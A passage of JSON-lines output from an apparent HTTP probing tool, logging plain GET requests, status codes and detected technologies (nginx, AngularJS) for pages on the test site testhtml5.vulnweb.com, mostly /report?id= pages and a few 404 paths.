\":\"344.407774ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.05403223Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=5ab51c5b07298787436bfdd2f28f059f\",\"input\":\"http://testhtml5.vulnweb.com/report?id=5ab51c5b07298787436bfdd2f28f059f\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=5ab51c5b07298787436bfdd2f28f059f\",\"time\":\"344.172187ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.055045395Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=5ea32a19b1b22385bac9ebbcfe74aaf8\",\"input\":\"http://testhtml5.vulnweb.com/report?id=5ea32a19b1b22385bac9ebbcfe74aaf8\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=5ea32a19b1b22385bac9ebbcfe74aaf8\",\"time\":\"347.807818ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.090270076Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=5eb76cfeefddf6d15e0a73560c89c10e\",\"input\":\"http://testhtml5.vulnweb.com/report?id=5eb76cfeefddf6d15e0a73560c89c10e\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=5eb76cfeefddf6d15e0a73560c89c10e\",\"time\":\"349.403398ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.101994881Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=5f3fa69870b737ad308ec9543993be14\",\"input\":\"http://testhtml5.vulnweb.com/report?id=5f3fa69870b737ad308ec9543993be14\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=5f3fa69870b737ad308ec9543993be14\",\"time\":\"358.168004ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.102769129Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=617c785e96f91add44af3020e2c6064b\",\"input\":\"http://testhtml5.vulnweb.com/report?id=617c785e96f91add44af3020e2c6064b\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=617c785e96f91add44af3020e2c6064b\",\"time\":\"349.647703ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.125490937Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=64ea958af29c477568ca5219816bcda2\",\"input\":\"http://testhtml5.vulnweb.com/report?id=64ea958af29c477568ca5219816bcda2\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=64ea958af29c477568ca5219816bcda2\",\"time\":\"347.721803ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.138502047Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=6f2d3923bd9f39b07cd0bbaa30a5d523\",\"input\":\"http://testhtml5.vulnweb.com/report?id=6f2d3923bd9f39b07cd0bbaa30a5d523\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=6f2d3923bd9f39b07cd0bbaa30a5d523\",\"time\":\"340.524033ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.266892842Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=72e9a81dc7cbdb01a355f0febe80e6d6\",\"input\":\"http://testhtml5.vulnweb.com/report?id=72e9a81dc7cbdb01a355f0febe80e6d6\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=72e9a81dc7cbdb01a355f0febe80e6d6\",\"time\":\"348.719627ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.300811396Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=78b3cd3cbb8d9fd91830fc5f1e49f14e\",\"input\":\"http://testhtml5.vulnweb.com/report?id=78b3cd3cbb8d9fd91830fc5f1e49f14e\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=78b3cd3cbb8d9fd91830fc5f1e49f14e\",\"time\":\"344.238759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:55.207352873Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=7ce77381bf656a1c4e1cb3c3b176fe61\",\"input\":\"http://testhtml5.vulnweb.com/report?id=7ce77381bf656a1c4e1cb3c3b176fe61\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=7ce77381bf656a1c4e1cb3c3b176fe61\",\"time\":\"339.863873ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:55.220412409Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=7906144d5b0e85adfdf752593fdc3da6\",\"input\":\"http://testhtml5.vulnweb.com/report?id=7906144d5b0e85adfdf752593fdc3da6\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=7906144d5b0e85adfdf752593fdc3da6\",\"time\":\"356.868041ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:02.180008392Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=7e1874dfe43a608b00ef96d1e638bb31\",\"input\":\"http://testhtml5.vulnweb.com/report?id=7e1874dfe43a608b00ef96d1e638bb31\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=7e1874dfe43a608b00ef96d1e638bb31\",\"time\":\"349.736704ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:02.208875776Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=8035a702fd053e185f86d806dd8c5c1e\",\"input\":\"http://testhtml5.vulnweb.com/report?id=8035a702fd053e185f86d806dd8c5c1e\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=8035a702fd053e185f86d806dd8c5c1e\",\"time\":\"353.375018ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:02.21909704Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=87b02f8faa8c1a09c829865c475b5975\",\"input\":\"http://testhtml5.vulnweb.com/report?id=87b02f8faa8c1a09c829865c475b5975\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=87b02f8faa8c1a09c829865c475b5975\",\"time\":\"347.546774ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.183104943Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=94b2176bf4bfc26aa199760463b5ac18\",\"input\":\"http://testhtml5.vulnweb.com/report?id=94b2176bf4bfc26aa199760463b5ac18\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=94b2176bf4bfc26aa199760463b5ac18\",\"time\":\"342.178175ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.192378227Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=932986deac1c09c70b8a7bd425406ddc\",\"input\":\"http://testhtml5.vulnweb.com/report?id=932986deac1c09c70b8a7bd425406ddc\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=932986deac1c09c70b8a7bd425406ddc\",\"time\":\"358.217032ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.381267241Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=9fe7a1ee94d2ed27b641f4471d211610\",\"input\":\"http://testhtml5.vulnweb.com/report?id=9fe7a1ee94d2ed27b641f4471d211610\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=9fe7a1ee94d2ed27b641f4471d211610\",\"time\":\"349.81122ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.438161747Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=a3761ccd0d4419e7e9d0c5a0b5583445\",\"input\":\"http://testhtml5.vulnweb.com/report?id=a3761ccd0d4419e7e9d0c5a0b5583445\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=a3761ccd0d4419e7e9d0c5a0b5583445\",\"time\":\"354.195178ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.583070722Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=aaf3092d419422cca17a609c5d1d235f\",\"input\":\"http://testhtml5.vulnweb.com/report?id=aaf3092d419422cca17a609c5d1d235f\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=aaf3092d419422cca17a609c5d1d235f\",\"time\":\"344.04226ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.610860364Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=af9290a9e8bcd162818d45e5de1c6bef\",\"input\":\"http://testhtml5.vulnweb.com/report?id=af9290a9e8bcd162818d45e5de1c6bef\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=af9290a9e8bcd162818d45e5de1c6bef\",\"time\":\"344.097534ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.667400233Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=b045813e54c9dfeccaf6bfde5a9e87e4\",\"input\":\"http://testhtml5.vulnweb.com/report?id=b045813e54c9dfeccaf6bfde5a9e87e4\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=b045813e54c9dfeccaf6bfde5a9e87e4\",\"time\":\"345.139599ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.749592712Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=b4d50f99db49ff3d7d612a3b5e82b833\",\"input\":\"http://testhtml5.vulnweb.com/report?id=b4d50f99db49ff3d7d612a3b5e82b833\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=b4d50f99db49ff3d7d612a3b5e82b833\",\"time\":\"357.182926ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.798493658Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=b827d3c27534fd336f46b3aeabc1ff08\",\"input\":\"http://testhtml5.vulnweb.com/report?id=b827d3c27534fd336f46b3aeabc1ff08\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=b827d3c27534fd336f46b3aeabc1ff08\",\"time\":\"348.649872ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:03.818665878Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=cbe23fd8b33eeb0d70344ee753626698\",\"input\":\"http://testhtml5.vulnweb.com/report?id=cbe23fd8b33eeb0d70344ee753626698\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=cbe23fd8b33eeb0d70344ee753626698\",\"time\":\"357.750067ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.09828869Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=cf4d6c2961e4645eb906cc73452fce1e\",\"input\":\"http://testhtml5.vulnweb.com/report?id=cf4d6c2961e4645eb906cc73452fce1e\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=cf4d6c2961e4645eb906cc73452fce1e\",\"time\":\"349.350911ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.178318731Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=d11aec1e3f0c5b0ad4216a782f8d28c8\",\"input\":\"http://testhtml5.vulnweb.com/report?id=d11aec1e3f0c5b0ad4216a782f8d28c8\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=d11aec1e3f0c5b0ad4216a782f8d28c8\",\"time\":\"349.28959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.21885329Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=d9c866cb39b7b8f9b26abd7312a5808f\",\"input\":\"http://testhtml5.vulnweb.com/report?id=d9c866cb39b7b8f9b26abd7312a5808f\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=d9c866cb39b7b8f9b26abd7312a5808f\",\"time\":\"347.196297ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.358664024Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=e2c2fc2b15ad51ab0f954234af01ecb9\",\"input\":\"http://testhtml5.vulnweb.com/report?id=e2c2fc2b15ad51ab0f954234af01ecb9\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=e2c2fc2b15ad51ab0f954234af01ecb9\",\"time\":\"352.085504ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.359854088Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=e3824121332e609769f4d1cffe79ad44\",\"input\":\"http://testhtml5.vulnweb.com/report?id=e3824121332e609769f4d1cffe79ad44\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=e3824121332e609769f4d1cffe79ad44\",\"time\":\"352.749618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.394021553Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=e66e6688e7b4bb42eb5af74ef9acafea\",\"input\":\"http://testhtml5.vulnweb.com/report?id=e66e6688e7b4bb42eb5af74ef9acafea\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=e66e6688e7b4bb42eb5af74ef9acafea\",\"time\":\"343.551263ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.420904706Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=f239f69c075f10cc48df4cc9e7a3a457\",\"input\":\"http://testhtml5.vulnweb.com/report?id=f239f69c075f10cc48df4cc9e7a3a457\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=f239f69c075f10cc48df4cc9e7a3a457\",\"time\":\"353.425223ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.422622083Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=ebe93fea0729ba34a3a9503dab2e1b98\",\"input\":\"http://testhtml5.vulnweb.com/report?id=ebe93fea0729ba34a3a9503dab2e1b98\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=ebe93fea0729ba34a3a9503dab2e1b98\",\"time\":\"353.574184ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.45415247Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/robots.txt\",\"input\":\"http://testhtml5.vulnweb.com/robots.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/robots.txt\",\"time\":\"349.362564ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.457486449Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=fa00b1ed6ef78275a96eb27a075e862b\",\"input\":\"http://testhtml5.vulnweb.com/report?id=fa00b1ed6ef78275a96eb27a075e862b\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=fa00b1ed6ef78275a96eb27a075e862b\",\"time\":\"353.778242ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.458724816Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/row\",\"input\":\"http://testhtml5.vulnweb.com/row\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/row\",\"time\":\"352.959069ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.47256981Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/span\",\"input\":\"http://testhtml5.vulnweb.com/span\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/span\",\"time\":\"343.505336ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.487432645Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/app.js\",\"input\":\"http://testhtml5.vulnweb.com/static/app/app.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/app.js\",\"time\":\"344.49225ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":548,\"lines\":63,\"status_cod